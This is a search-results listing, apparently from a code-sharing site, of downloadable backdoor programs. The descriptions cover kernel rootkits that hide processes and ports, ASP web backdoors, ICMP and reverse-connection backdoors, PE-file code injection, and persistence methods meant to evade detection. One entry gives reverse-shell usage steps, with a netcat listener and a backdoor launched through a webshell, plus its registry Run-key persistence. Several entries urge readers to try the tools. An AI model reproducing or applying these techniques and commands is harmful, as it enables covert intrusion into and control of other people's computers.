Search - back Door
Description: Making a process more hidden on the system (2). Generally, a backdoor program has to modify certain system files so that it is executed at system startup, and it also has to be kept somewhere (usually on the hard disk). If the program could run on the system without doing either, the backdoor would be more hidden; that is, the program could not be found on the hard disk and there would be no entry for it in the system's startup configuration. Truly achieving this does not seem very realistic, but a simple method can be used: after the program has been executed, delete the program file and the modified part of the startup files, then, before the system is shut down, store the program file and change the startup files again so that it is executed at the next system startup. The program is an executable file, and the system protects it while it is running; deleting it would require changing the system, which is a lot of trouble. The code can instead be put into another program and run as a thread of another process, that is, by using the create-remote-thread function. A system is generally shut down in one of three ways: normal shutdown, power loss (abnormal shutdown), and one-key shutdown (pressing power). On a normal shutdown the program receives the CTRL_SHUTDOWN_EVENT signal; for one-key shutdown a hook can simply be used; but for power loss (abnormal shutdown) 老农 really cannot think of a way. Fortunately this rarely happens on typical NT servers. On NT systems, CreateService is used to register a service, before the system SHUTDOWN of course. At startup, DeleteService is used to delete this service, a copy of the program file is kept in virtual memory, and the program on the hard disk is deleted
Size: 75506 | Author: 无间刀
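Description: How to write embedded programs for PE executable files, with examples (embedded backdoor program & original program). Microsoft's Windows is the operating system used on most personal computers today, mainly win95, 98, me, nt4, 2000, xp and so on, and the executable file format these systems use is essentially the PE structure. The embedded program for executable files described here targets PE-structured executables. First, a brief outline of the PE file layout: DOS MZ header; DOS stub // on operating systems that do not support the PE file format it simply displays an error message; PE header // contains much important information used by the PE loader; Section table // information about each Section; Section 1, Section 2, Section 3.... Because of SectionAlignment (section alignment), a lot of space is left between Sections, and the embedded program's code can be placed in the gaps between Sections. A more convenient method is to put the code at the end of the last Section and then change Misc.VirtualSize and SizeOfRawData, two members of the IMAGE_SECTION_HEADER structure array located in the Section table. If the code is very long, the embedded code sometimes cannot be loaded completely and an error results; in that case SizeOfImage in the IMAGE_NT_HEADERS structure needs to be changed. API call addresses also differ between WINDOWS versions; to solve this problem the import table can be changed so that the loader
Size: 79185 | Author: 无间刀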
Description: Source code of a good kernel-level backdoor; its operations on the system kernel are well worth studying.
Size: 132476 | Author: 王学家
Description: A powerful backdoor tool. Have you used it? If not, hurry up and give it a try!
Size: 54501 | Author: 吴大章
Description: Hacker Defender 1.0.0
Kernel-level backdoor software. With it, users can hide files, processes, system services, system drivers, registry keys and values, and open ports, and fake the available disk space. The program also disguises in memory the changes it has made, and covertly controls the hidden processes. The program installs a hidden backdoor, registers a hidden system service and installs a system driver. The backdoor technique allows a Redirector to be implanted. Because it has so many parameters, it is not recommended for beginners.
Size: 92628 | Author: 苹果
Description: ASP backdoor; can directly delete and view files in a virtual directory.
Size: 6209 | Author: 韩毅
Description: ASP backdoor; can directly delete and view files in a virtual directory.
Size: 6144 | Author: 韩毅
Description: A virus written in C, back door.
Size: 1024 | Author: 王勇
Description: A very fun remote-control backdoor. The server side can be compiled.
Size: 4096 | Author: 潘来安
Description: Introduction:
In web penetration testing, we often find that the host's ports are filtered: a backdoor is created successfully but cannot be connected to. In that case this reverse-connection backdoor may be of some use.
Usage:
1. Listen on a port on the local machine:
netcat -vv -l -p 80
2. Run the backdoor through a webShell or some other means:
binder2 80 youIPadd
3. The local listening port will receive a cmd from the remote host.
Note:
The program creates an auto-start entry for itself. If run with no arguments, it connects to the default IP and default port; this exe's default IP address is the internal address 10.24.9.100, port 7358.
The program copies itself to c:\winnt\ under the name syslog.exe and creates a startup key under
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. To uninstall, use the binder2 /kill command. (If blocked by permission problems, these actions will not be carried out, for example when run from a webshell.)
The archive contains the source code; changing the code as needed before use is recommended.
Size: 12288 | Author: 张军
Description: Kernel-level backdoor software. With it, users can hide files, processes, system services, system drivers, registry keys and values, and open ports, and fake the available disk space. The program also disguises in memory the changes it has made, and covertly controls the hidden processes. The program installs a hidden backdoor, registers a hidden system service and installs a system driver.
Size: 92160 | Author: 袁
Description: Legend of the World (传奇世界) engine. Source code that leaked after AFT closed down. Modified to remove the backdoor commands.
Size: 1582080 | Author: pc8288
Description: A simple forward-connection backdoor model; beginners can study it as a sample or rework it themselves.
Size: 6144 | Author: 黄山
Description: Ordinary backdoors no longer meet requirements; this program implements a reverse-connection backdoor in C++.
Size: 2371584 | Author: 刘文文
Description: Typical backdoors are connection-oriented (TCP-based) and easy to detect, whereas the ICMP backdoor code is UDP-based and connectionless, and not easy to detect; this program implements an ICMP backdoor in C++.
Size: 3550208 | Author: 刘文文
Description: A portless ICMP backdoor program that uses the ICMP protocol for remote background control, for example process control.
Size: 13312 | Author: rune_x
Description: Hacker programming in C [4] - writing a dual-pipe active-connection backdoor
Size: 13625344 | Author: Steven
Description: Hacker programming in C [5] - writing a single-pipe active-connection backdoor
Size: 8481792 | Author: Steven
Description: Hacker programming in C [6] - writing a zero-pipe active-connection backdoor
Size: 5020672 | Author: Steven
Description: Ghost1.0, wolf's revision: stable version, no backdoor, compiles normally.
Size: 11300864 | Author: 小白爱吃饭